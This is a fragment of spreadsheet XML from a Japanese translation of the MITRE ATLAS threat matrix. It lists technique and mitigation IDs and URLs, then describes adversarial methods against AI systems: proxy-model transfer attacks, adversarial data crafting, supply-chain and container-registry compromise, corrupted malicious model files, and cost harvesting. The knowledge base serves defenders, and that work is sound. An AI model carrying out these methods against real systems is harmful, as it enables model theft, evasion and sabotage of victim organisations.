    <t>attack-pattern--f31b06f2-9f55-4477-a7df-278c6ea9e2d8</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0066</t>
  </si>
  <si>
    <t>AML.T0072</t>
  </si>
  <si>
    <t>attack-pattern--66169e1d-131b-41f6-8ab5-8603d8f7a03b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0072</t>
  </si>
  <si>
    <t>AML.T0004</t>
  </si>
  <si>
    <t>attack-pattern--382d0462-947d-4d13-94a9-8dccc130fbc3</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0004</t>
  </si>
  <si>
    <t>AML.T0001</t>
  </si>
  <si>
    <t>attack-pattern--2eeed418-51b8-4243-aea6-c802a6220e30</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0001</t>
  </si>
  <si>
    <t>AML.T0000</t>
  </si>
  <si>
    <t>attack-pattern--cf106628-da5b-47b7-950f-9658391857af</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000</t>
  </si>
  <si>
    <t>AML.T0003</t>
  </si>
  <si>
    <t>attack-pattern--2fd7ca0a-8ca1-44fa-852f-f68db00b756d</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0003</t>
  </si>
  <si>
    <t>AML.T0008.004</t>
  </si>
  <si>
    <t>attack-pattern--9ff99618-2174-4826-87c5-05603723a0b2</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.004</t>
  </si>
  <si>
    <t>AML.T0048.002</t>
  </si>
  <si>
    <t>attack-pattern--5c410f62-7a6b-4759-947d-18e110e0706c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.002</t>
  </si>
  <si>
    <t>AML.T0016.001</t>
  </si>
  <si>
    <t>attack-pattern--b1f3f9e9-0b83-430e-81e1-05f90612009e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016.001</t>
  </si>
  <si>
    <t>AML.T0046</t>
  </si>
  <si>
    <t>attack-pattern--92eb716e-f0e3-47de-8693-107bbd9d6554</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0046</t>
  </si>
  <si>
    <t>AML.T0052.000</t>
  </si>
  <si>
    <t>attack-pattern--34a1e3e5-aef6-466e-b7fd-83f958a5aa75</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0052.000</t>
  </si>
  <si>
    <t>AML.T0069.000</t>
  </si>
  <si>
    <t>attack-pattern--2d916848-8a92-4aa7-9b08-e8d61fe7af1f</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069.000</t>
  </si>
  <si>
    <t>AML.T0079</t>
  </si>
  <si>
    <t>attack-pattern--d8d9c2c8-8537-4515-887a-69aa029bc1c6</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0079</t>
  </si>
  <si>
    <t>AML.T0069.001</t>
  </si>
  <si>
    <t>attack-pattern--928e83ff-b63f-473f-a0d3-a20fd9b8e9c7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069.001</t>
  </si>
  <si>
    <t>AML.T0069.002</t>
  </si>
  <si>
    <t>attack-pattern--34975325-8143-4099-8af1-f83de967d177</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069.002</t>
  </si>
  <si>
    <t>AML.T0000.002</t>
  </si>
  <si>
    <t>attack-pattern--459dc255-c7a4-4aef-ba10-0b402f66c694</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000.002</t>
  </si>
  <si>
    <t>AML.T0005.000</t>
  </si>
  <si>
    <t>attack-pattern--279383cb-aaac-480d-aa91-39d44da7cd55</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005.000</t>
  </si>
  <si>
    <t>AML.T0005.001</t>
  </si>
  <si>
    <t>attack-pattern--ec881f8c-1b0f-466d-abef-5e56521fcd93</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005.001</t>
  </si>
  <si>
    <t>AML.T0011.000</t>
  </si>
  <si>
    <t>attack-pattern--a9bc20bd-9f88-4794-8ff3-cfd86a2bc2ae</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0011.000</t>
  </si>
  <si>
    <t>AML.T0055</t>
  </si>
  <si>
    <t>attack-pattern--581a34ca-98ae-4a6a-94eb-38b6a6f16b22</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0055</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>AML.T0005.002</t>
  </si>
  <si>
    <t>attack-pattern--45238ba0-2955-4ab7-b26f-c8892d32d86b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005.002</t>
  </si>
  <si>
    <t>AML.T0011</t>
  </si>
  <si>
    <t>attack-pattern--67487920-42fd-43d6-86d9-52e683e64c19</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0011</t>
  </si>
  <si>
    <t>AML.T0048.003</t>
  </si>
  <si>
    <t>attack-pattern--6259d6af-6e70-4597-a577-8e71f2a15af7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.003</t>
  </si>
  <si>
    <t>AML.T0012</t>
  </si>
  <si>
    <t>attack-pattern--c476cf85-34c6-4c06-a4b5-062bd6001b38</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0012</t>
  </si>
  <si>
    <t>AML.T0042</t>
  </si>
  <si>
    <t>attack-pattern--fe2f48bd-5f4c-49a2-9e65-cbf2d2267b46</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0042</t>
  </si>
  <si>
    <t>AML.T0043.000</t>
  </si>
  <si>
    <t>attack-pattern--e7df1199-39d9-4d35-bee7-5f7f8ef8f9cd</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
  </si>
  <si>
    <t>AML.TA0001</t>
  </si>
  <si>
    <t>x-mitre-tactic--388330a4-f142-4895-935c-0fc615225df0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0001</t>
  </si>
  <si>
    <t>AML.TA0000</t>
  </si>
  <si>
    <t>x-mitre-tactic--07adc703-b1fb-473f-a9e6-ef4fd6a58442</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0000</t>
  </si>
  <si>
    <t>AML.TA0009</t>
  </si>
  <si>
    <t>x-mitre-tactic--af4c8070-9618-4da2-bfec-2cc253f41ae3</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0009</t>
  </si>
  <si>
    <t>AML.TA0014</t>
  </si>
  <si>
    <t>x-mitre-tactic--b370966c-00c6-4b7c-948b-9e1b805bc6da</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0014</t>
  </si>
  <si>
    <t>AML.TA0013</t>
  </si>
  <si>
    <t>x-mitre-tactic--398fa5a9-194c-483e-82d6-9a6b57e3eefc</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0013</t>
  </si>
  <si>
    <t>AML.TA0007</t>
  </si>
  <si>
    <t>x-mitre-tactic--c9cf0175-296e-4439-852d-afb870ed5e0c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0007</t>
  </si>
  <si>
    <t>AML.TA0008</t>
  </si>
  <si>
    <t>x-mitre-tactic--d57d4782-2e85-447d-91a8-0cb8123a4f21</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0008</t>
  </si>
  <si>
    <t>AML.TA0005</t>
  </si>
  <si>
    <t>x-mitre-tactic--1f442889-a32d-4355-b079-54dfaa6564ca</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0005</t>
  </si>
  <si>
    <t>AML.TA0010</t>
  </si>
  <si>
    <t>x-mitre-tactic--cbc44930-843c-41be-b07a-93234ce861c0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0010</t>
  </si>
  <si>
    <t>AML.TA0011</t>
  </si>
  <si>
    <t>x-mitre-tactic--6086655a-a9dc-4962-87ef-ca7eef261820</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0011</t>
  </si>
  <si>
    <t>AML.TA0004</t>
  </si>
  <si>
    <t>x-mitre-tactic--30a41790-7c46-4913-a7ff-38fadd67c15e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0004</t>
  </si>
  <si>
    <t>AML.TA0006</t>
  </si>
  <si>
    <t>x-mitre-tactic--fe06fd86-737a-412a-abfd-4b6f38c264d5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0006</t>
  </si>
  <si>
    <t>AML.TA0012</t>
  </si>
  <si>
    <t>x-mitre-tactic--d900d1a1-0715-4f22-92a0-cf292a2761e4</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0012</t>
  </si>
  <si>
    <t>AML.TA0002</t>
  </si>
  <si>
    <t>x-mitre-tactic--8ed07aa0-b2fb-4267-ad98-84da4669dcec</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0002</t>
  </si>
  <si>
    <t>AML.TA0003</t>
  </si>
  <si>
    <t>x-mitre-tactic--fbc5143a-9d65-44dd-8ff6-1fde80208cf3</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0003</t>
  </si>
  <si>
    <t>AML.M0023</t>
  </si>
  <si>
    <t>course-of-action--d28fd806-c567-4cce-bcef-4981908f8dbc</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0023</t>
  </si>
  <si>
    <t>AML.M0017</t>
  </si>
  <si>
    <t>course-of-action--0ecbe6e0-865e-439c-925b-da558632bda6</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0017</t>
  </si>
  <si>
    <t>AML.M0024</t>
  </si>
  <si>
    <t>course-of-action--c887ee08-5448-41bb-a94a-e53bfedfa8b7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0024</t>
  </si>
  <si>
    <t>AML.M0015</t>
  </si>
  <si>
    <t>course-of-action--99b7b032-7353-436b-a200-f52fca92cb11</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0015</t>
  </si>
  <si>
    <t>AML.M0013</t>
  </si>
  <si>
    <t>course-of-action--73e8d31a-5f48-4415-8f74-4f443a853050</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0013</t>
  </si>
  <si>
    <t>AML.M0005</t>
  </si>
  <si>
    <t>course-of-action--35a8cc31-c63d-4fb9-90c0-1dbba7bc724a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0005</t>
  </si>
  <si>
    <t>AML.M0019</t>
  </si>
  <si>
    <t>course-of-action--8ec8b9e0-1934-4298-a1b3-f7c90bd9d864</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0019</t>
  </si>
  <si>
    <t>AML.M0012</t>
  </si>
  <si>
    <t>course-of-action--633d5427-a2a6-4453-8675-7378e1b870e2</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0012</t>
  </si>
  <si>
    <t>AML.M0020</t>
  </si>
  <si>
    <t>course-of-action--ed266799-ad60-4515-a112-fb668d12cc07</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0020</t>
  </si>
  <si>
    <t>AML.M0021</t>
  </si>
  <si>
    <t>course-of-action--e0135277-437f-4b2f-a2bd-66eee71c15e5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0021</t>
  </si>
  <si>
    <t>AML.M0022</t>
  </si>
  <si>
    <t>course-of-action--b45ca9a8-2fe5-467b-b431-b9214c4f3e9b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0022</t>
  </si>
  <si>
    <t>AML.M0010</t>
  </si>
  <si>
    <t>course-of-action--2310ea30-59c9-425c-8ca7-826d267555df</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0010</t>
  </si>
  <si>
    <t>AML.M0001</t>
  </si>
  <si>
    <t>course-of-action--d9f92e31-bd25-4e24-8e09-a6dadcfd8020</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0001</t>
  </si>
  <si>
    <t>AML.M0000</t>
  </si>
  <si>
    <t>course-of-action--c2885145-a7d5-4100-983d-4d6de9f26425</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0000</t>
  </si>
  <si>
    <t>AML.M0025</t>
  </si>
  <si>
    <t>course-of-action--56c77b01-667d-4f45-83f6-8c25e23b7e4c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0025</t>
  </si>
  <si>
    <t>AML.M0003</t>
  </si>
  <si>
    <t>course-of-action--d7a6bd67-982c-4fc0-91ec-8bf86b156055</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0003</t>
  </si>
  <si>
    <t>AML.M0002</t>
  </si>
  <si>
    <t>course-of-action--4981d26b-37c3-42be-83ff-298b1fb7710f</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0002</t>
  </si>
  <si>
    <t>AML.M0011</t>
  </si>
  <si>
    <t>course-of-action--564257e2-a859-4a6b-b01a-0a997fe06590</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0011</t>
  </si>
  <si>
    <t>AML.M0004</t>
  </si>
  <si>
    <t>course-of-action--6b033c58-3eb4-4afb-97d1-f4ea00ae2849</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0004</t>
  </si>
  <si>
    <t>AML.M0007</t>
  </si>
  <si>
    <t>course-of-action--de16f78e-92bc-427d-92da-6f71bf0a4418</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0007</t>
  </si>
  <si>
    <t>AML.M0006</t>
  </si>
  <si>
    <t>course-of-action--cf12cfaa-408e-4bd0-85fb-9e068dc8699a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0006</t>
  </si>
  <si>
    <t>AML.M0009</t>
  </si>
  <si>
    <t>course-of-action--7de8e8c2-de8d-4000-b87f-385d36e1bf81</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0009</t>
  </si>
  <si>
    <t>AML.M0018</t>
  </si>
  <si>
    <t>course-of-action--4237c0ff-cea4-42bd-8419-9f05ea23798b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0018</t>
  </si>
  <si>
    <t>AML.M0008</t>
  </si>
  <si>
    <t>course-of-action--50791788-7055-4498-9b8e-24737141921f</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0008</t>
  </si>
  <si>
    <t>AML.M0014</t>
  </si>
  <si>
    <t>course-of-action--7ae9540a-f380-495a-8a5a-5413378defd5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0014</t>
  </si>
  <si>
    <t>AML.M0016</t>
  </si>
  <si>
    <t>course-of-action--ff8b3c2e-aeab-4d66-a7bf-86058bb77ed3</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0016</t>
  </si>
  <si>
    <t>名称</t>
  </si>
  <si>
    <t>説明</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>作成日付</t>
  </si>
  <si>
    <t>最終更新日付</t>
  </si>
  <si>
    <t>戦術</t>
  </si>
  <si>
    <t>プラットフォーム</t>
  </si>
  <si>
    <t>AI アーティファクトの収集</t>
  </si>
  <si>
    <t>敵対者は、[持出し](/tactics/AML.TA0010) または [AI 攻撃のステージング](/tactics/AML.TA0001) で使用するために ML アーティファクトを収集する場合があります。AI アーティファクトには、モデルとデータセットのほか、モデルとのやり取り時に生成されるその他のテレメトリ データが含まれます。</t>
  </si>
  <si>
    <t>AI 開発のワークスペース</t>
  </si>
  <si>
    <t>AI 攻撃の開発とステージングには、多くの場合、高価なコンピューティング リソースが必要です。敵対者は、攻撃を開発するために 1 つ以上の GPU にアクセスする必要がある場合があります。敵対者は、作戦を実行するための一時的なリソースを効率的に立ち上げる方法として、Google Colaboratory などの無料リソースや、AWS、Azure、Google Cloud などのクラウド リソースを匿名で使用しようとする場合があります。検出を回避するために、複数のワーク スペースが使用される場合があります。</t>
  </si>
  <si>
    <t>AI 知的財産の窃取</t>
  </si>
  <si>
    <t>敵対者は AI アーティファクトを持出して知的財産を盗み、被害者組織に経済的損害を与える可能性があります。
プロプラエタリーな学習データは、収集とアノテーションにコストがかかり、[持出し](/tactics/AML.TA0010) や窃取の対象となる可能性があります。
AIaaS プロバイダーは API の使用料を請求します。[持出し](/tactics/AML.TA0010) または [AI モデルの抽出](/techniques/AML.T0024.002) を介してモデルを窃取した敵対者は、知的財産の所有者に料金を支払うことなく、そのサービスを無制限に使用できるようになります。</t>
  </si>
  <si>
    <t>AI モデルの推論 API へのアクセス</t>
  </si>
  <si>
    <t>敵対者は、推論 API への正当なアクセスを介してモデルにアクセスする可能性があります。推論 API へのアクセスは、敵対者にとっての情報源（[AI モデルのオントロジーの探索](/techniques/AML.T0013)、[AI モデル ファミリーの探索](/techniques/AML.T0014)）、攻撃を検証する手段（[攻撃の検証](/techniques/AML.T0042)、[敵対的データの作成](/techniques/AML.T0043)）、または影響を与えるために標的のシステムにデータを導入する手段（AI モデルの回避](/techniques/AML.T0015)、[AI モデルの整合性の侵害](/techniques/AML.T0031)）となる可能性があります。
多くのシステムは推論 API 経由で提供される同一のモデルに依存しており、これはつまり、共通の脆弱性を抱えていることを意味します。これは特に、学習に膨大なリソースを必要とする基盤モデルに当てはまります。敵対者は、モデルの API へのアクセスを利用して、脱獄や幻覚といった脆弱性を特定し、同じモデルを使用するアプリケーションを標的にする可能性があります。</t>
  </si>
  <si>
    <t>AI ソフトウェア</t>
  </si>
  <si>
    <t>ほとんどの AI システムは、限られた数の AI フレームワークに依存しています。敵対者は、サプライ チェーンの 1 つを構成することで、多数の AI システムにアクセスできます。多くの AI プロジェクトは、さまざまなアルゴリズムの他のオープン ソース実装にも依存しています。これらも、特定のシステムにアクセスするために標的を絞って侵害される可能性があります。</t>
  </si>
  <si>
    <t>AI サプライ チェーンの侵害</t>
  </si>
  <si>
    <t>敵対者は、AI サプライ チェーンの固有の部分を侵害することで、システムへの初期アクセスを獲得する可能性があります。これには、[GPU ハードウェア](/techniques/AML.T0010.000)、[データ](/techniques/AML.T0010.002) とそのアノテーション、AI [AI ソフトウェア](/techniques/AML.T0010.001) スタックの一部、または [モデル（注: 原文 "Model"）](/techniques/AML.T0010.003) 自体が含まれる可能性があります。
場合によっては、敵対者は、サプライ チェーンの侵害済みコンポーネントを使用して攻撃を完全に実行するために、二次アクセスが必要になります。</t>
  </si>
  <si>
    <t>AI 対応の製品やサービス</t>
  </si>
  <si>
    <t>敵対者は、AI を裏で使用している製品やサービスを使用して、基盤となる AI モデルにアクセスする可能性があります。この種類の間接的なモデル アクセスにより、AI モデルの詳細やログまたはメタデータ内の推論が明らかになる可能性があります。</t>
  </si>
  <si>
    <t>インフラストラクチャの獲得</t>
  </si>
  <si>
    <t>公開されている AI アーティファクトの獲得</t>
  </si>
  <si>
    <t>敵対者は、クラウド ストレージ、一般向けサービス、ソフトウェアまたはデータ リポジトリなどの公開ソースを検索して、AI アーティファクトを特定する可能性があります。これらの AI アーティファクトには、モデルの学習とデプロイに使用されるソフトウェア スタック、学習データとテスト データ、モデル構成とパラメーターが含まれる場合があります。敵対者は、被害者組織によってホストされているアーティファクトや被害者組織に関連付けられているアーティファクトに特に関心を持ちます。これらのアーティファクトは、その組織が実稼働環境で使用しているものを表す可能性があるためです。敵対者は、被害者組織に関連付けられている他のリソース ([被害者所有の Web サイトの検索](/techniques/AML.T0003) や [公開されている技術データベースの検索](/techniques/AML.T0000) など) を介してアーティファクト リポジトリを特定する場合があります。これらの AI アーティファクトは、多くの場合、AI のタスクとアプローチの詳細を攻撃者に提供します。
AI アーティファクトは、攻撃者が [プロキシ AI モデルの作成](/techniques/AML.T0005) を行うのに役立ちます。これらのアーティファクトに実際の本番環境のモデルの一部が含まれている場合、それらを使用して直接 [敵対的データの作成](/techniques/AML.T0043) を行うことができます。一部のアーティファクトを取得するには、（メール アドレスや名前などのユーザーの詳細を提示するような）登録、AWS キー、または書面によるリクエストが必要であり、敵対者は [アカウントの確立](/techniques/AML.T0021) を行う必要がある場合もあります。
アーティファクトは、被害者が管理するインフラストラクチャでホストされ、被害者にそのデータにアクセスした人物に関する情報を提供することもあります。</t>
  </si>
  <si>
    <t>能動的なスキャン</t>
  </si>
  <si>
    <t>敵対者は、標的とするための情報を収集するために、被害者のシステムを調査またはスキャンすることがあります。これは、被害者のシステムと直接やり取りしない他の偵察手法とは異なります。</t>
  </si>
  <si>
    <t>AI への敵対的攻撃の実装</t>
  </si>
  <si>
    <t>敵対者は、AI への攻撃用の既存のオープンソース実装を探す可能があります。研究コミュニティは、再現性と将来の研究を促進するために、コードを公開することがよくあります。CleverHans、Adversarial Robustness Toolbox、FoolBox などの研究目的のライブラリは、敵対者によって武器化される可能性があります。敵対者は、攻撃の一環として、元々は AI への敵対的攻撃用に設計されていないツールを入手して使用する場合もあります。</t>
  </si>
  <si>
    <t>AI への敵対的攻撃</t>
  </si>
  <si>
    <t>ブラック ボックス最適化</t>
  </si>
  <si>
    <t>ブラック ボックス攻撃では、敵対者は標的のモデルへのブラック ボックス アクセス（つまり、API アクセス経由の [AI モデルの推論 API アクセス](/techniques/AML.T0040)）を行います。ブラック ボックス攻撃では、敵対者は被害者が監視している API を使用している可能性があります。これらの攻撃は、一般に [ホワイト ボックス最適化](/techniques/AML.T0043.000) 攻撃よりも効果が低く、より多くの推論が必要ですが、必要なアクセスははるかに少なくなります。</t>
  </si>
  <si>
    <t>ブラック ボックス転送</t>
  </si>
  <si>
    <t>ブラック ボックス転送攻撃では、敵対者は、完全なアクセス権を持ち、標的のモデルを代表する 1 つ以上のプロキシー モデル（[プロキシー AI モデルの作成](/techniques/AML.T0005) または [レプリケーションによるプロキシーの学習](/techniques/AML.T0005.001) によって学習済みであるモデル) を使用します。敵対者は、プロキシー モデルに対して [ホワイトボックス最適化](/techniques/AML.T0043.000) を使用して、敵対的サンプルを生成します。プロキシー モデルのセットが標的のモデルに十分近い場合、敵対的サンプルは 1 つのモデルから別のモデルに一般化される可能性が高くなります。つまり、プロキシー モデルに有効な攻撃は、標的のモデルにも有効である可能性が高いということです。敵対者が [AI モデルの推論 API へのアクセス](/techniques/AML.T0040) を行うことができる場合、[攻撃の検証](/techniques/AML.T0042) を使用して攻撃が機能していることを確認し、その情報を学習プロセスに組み込むことができます。</t>
  </si>
  <si>
    <t>引用</t>
  </si>
  <si>
    <t>敵対者は、AI システムの応答で提供される引用を操作し、その信頼性を偽装する可能性があります。その例としては、間違った引用を引用したり、新たな引用を捏造したり、あるいは正しい引用であっても攻撃者が提供したデータに対しては正しい引用を引用したりするといったことが挙げられます。</t>
  </si>
  <si>
    <t>クラウド サービスの探索</t>
  </si>
  <si>
    <t>コマンドおよびスクリプト インタープリター</t>
  </si>
  <si>
    <t>敵対者は、コマンドおよびスクリプト インタープリターを悪用して、コマンド、スクリプト、またはバイナリーを実行する可能性があります。これらのインターフェースと言語は、コンピューター システムと対話する方法を提供し、さまざまなプラットフォームで共通の機能です。ほとんどのシステムには、組み込みのコマンドライン インターフェースとスクリプト機能が付属しています。たとえば、macOS および Linux ディストリビューションには多種の Unix Shell が含まれ、Windows インストールには Windows Command Shell と PowerShell が含まれます。
また、Python などのクロスプラットフォーム インタープリターや、JavaScript や Visual Basic などのクライアント アプリケーションに通常関連しているインタープリターもあります。
敵対者は、任意のコマンドを実行する手段として、さまざまな方法でこれらのテクノロジーを悪用する可能性があります。コマンドとスクリプトは、おとり文書として被害者に配信される初期アクセス ペイロードに埋め込まれるか、既存の C2 からダウンロードされるセカンダリー ペイロードとして埋め込まれます。敵対者は、対話型ターミナル/シェルを介してコマンドを実行したり、さまざまなリモート サービスを利用してリモート実行を実現したりすることもできます。</t>
  </si>
  <si>
    <t>消費者向けハードウェア</t>
  </si>
  <si>
    <t>敵対者は、攻撃を実行するために消費者向けハードウェアを入手する場合があります。ハードウェアを所有することで、敵対者は環境を完全に制御できます。これらのデバイスは追跡が困難です。</t>
  </si>
  <si>
    <t>コンテナ レジストリ</t>
  </si>
  <si>
    <t>敵対者は、改ざんされたコンテナ イメージをプッシュし、既存のコンテナ名やタグを上書きすることで、被害者のコンテナ レジストリを侵害する可能性があります。コンテナ レジストリのユーザーや自動化された CI/CD パイプラインは、攻撃者のコンテナ イメージをプルし、AI サプライ チェーンを侵害する可能性があります。これは、開発環境やデプロイメント環境に影響を及ぼす可能性があります。
コンテナ イメージには AI モデルが含まれている場合があり、侵害されたイメージには、攻撃者によって操作された AI モデルが含まれている可能性があります（[AI モデルの操作](/techniques/AML.T0018) を参照）。</t>
  </si>
  <si>
    <t>AI モデルの破損</t>
  </si>
  <si>
    <t>敵対者は、モデル スキャナによる検出を回避するために、悪意のある AI モデル ファイルを意図的に破損させ、デシリアライズを不可能にする可能性があります。破損したモデルは、デシリアライズが失敗する前に悪意のあるコードを実行する可能性があります。</t>
  </si>
  <si>
    <t>コスト ハーベスティング</t>
  </si>
  <si>
    <t>敵対者は、さまざまな機械学習サービスを標的にして、無駄なクエリーや計算コストの高い入力を送信し、被害者の組織でのサービス実行コストを増やす可能性があります。Sponge Example とは、エネルギー消費を最大化し、運用コストを最大化するように設計された特定の種類の敵対的データのことを指します。</t>
  </si>
  <si>
    <t>敵対的データの作成</t>
  </si>
  <si>
    <t>敵対的データとは、機械学習モデルへの入力で、敵対者が標的のモデルに望む効果をもたらすように変更されたものです。効果は、誤分類、検出漏れ、エネルギー消費の最大化など多岐にわたります。通常、変更は規模や場所が制限されるため、人間はデータが変更されていないかのように認識しますが、敵対者の意図する効果によっては、人間の認識が常に問題になるわけではありません。例えば、画像分類タスクの敵対的入力は、AI モデルでは誤分類されますが、人間は正しいクラスが含まれていると認識します。
敵対者は、標的のモデルに関する知識とアクセスに応じて、異なるクラスのアルゴリズムを使用して敵対的サンプルを開発する可能性があります。たとえば、[ホワイト ボックス最適化](/techniques/AML.T0043.000)、[ブラック ボックス最適化](/techniques/AML.T0043.001)、[ブラック ボックス転送](/techniques/AML.T0043.002)、[手動による変更](/techniques/AML.T0043.003) などです。
敵対者は、モデルへのホワイト ボックスまたは推論 API アクセスがある場合、そのアプローチが機能するかどうかを [攻撃の検証](/techniques/AML.T0042) を行うことができます。これにより、敵対者は、攻撃が気付かれる可能性のある「ライブ」環境で攻撃が効果的であることをと確信できます。その後、敵対者は後でその攻撃を使用して目標を達成できます。敵対者は、[AI モデルの回避](/techniques/AML.T0015) をしたり、[AI モデルの整合性の侵害](/techniques/AML.T0031) をしたりするために敵対的サンプルを最適化する可能性があります。</t>
  </si>
  <si>
    <t>プロキシー AI モデルの作成</t>
  </si>
  <si>
    <t>敵対者は、被害者の組織で使用されている標的のモデルのプロキシーとして機能するモデルを入手する可能性があります。プロキシー モデルは、完全にオフラインの状態で標的のモデルへの完全なアクセスをシミュレートするために使用されます。
敵対者は、代表的なデータセットからモデルを学習させたり、被害者の推論 API からモデルをレプリケーションしようとしたり、利用可能な事前学習済みモデルを使用したりする可能性があります。</t>
  </si>
  <si>
    <t>データ</t>
  </si>
  <si>
    <t>データは、敵対者にとってサプライ チェーン侵害の重要なベクトルです。すべての AI プロジェクトには、何らかの形式のデータが必要です。多くの AIプロジェクトは、公開されている大規模なオープン ソース データセットに依存しています。敵対者は、これらのデータ ソースを侵害する可能性があります。悪意のあるデータは、[学習データの汚染](/techniques/AML.T0020) の結果であることもあれば、従来のマルウェアを含んでいることもあります。
敵対者は、ラベル付けフェーズでプライベート データセットを標的にすることもできます。プライベート データセットを作成するには、多くの場合、外部のラベル付けサービスを利用する必要があります。敵対者は、ラベル付けサービスによって生成されるラベルを変更することで、データセットを改ざんできます。</t>
  </si>
  <si>
    <t>情報リポジトリのデータ</t>
  </si>
  <si>
    <t>敵対者は、情報リポジトリを利用して貴重な情報をマイニングする可能性があります。
情報リポジトリーは、通常、ユーザー間のコラボレーションや情報共有を容易にするために情報を保存できるツールであり、敵対者のさらなる目的に役立つ可能性のあるさまざまなデータや、標的の情報への直接アクセスを保存できます。
リポジトリーに保存される情報は、特定のインスタンスまたは環境によって異なる場合があります。
一般的な情報リポジトリーには、SharePoint、Confluence、SQL Server などのエンタープライズ データベースなどがあります。</t>
  </si>
  <si>
    <t>ローカル システムのデータ</t>
  </si>
  <si>
    <t>敵対者は、ファイル システムや構成ファイル、ローカル データベースなどのローカル システム ソースを検索して、持出し前に関心のあるファイルや機密データを探すことがあります。
これには、基本的なフィンガープリント情報や SSH キーなどの機密データが含まれる場合があります。</t>
  </si>
  <si>
    <t>データセット</t>
  </si>
  <si>
    <t>敵対者は、公開データセットを収集して、それを作戦に利用することがあります。被害者組織が使用するデータセット、または被害者組織が使用するデータを代表するデータセットは、敵対者にとって貴重なものとなる可能性があります。データセットは、クラウド ストレージまたは被害者所有の Web サイトに保存できます。一部のデータセットでは、敵対者がアクセスするために [アカウントの確立](/techniques/AML.T0021) を行う必要があります。
取得したデータセットは、攻撃者が作戦を進め、攻撃を仕掛け、被害者組織に合わせた攻撃を行うのに役立ちます。</t>
  </si>
  <si>
    <t>AI サービスへの運用妨害</t>
  </si>
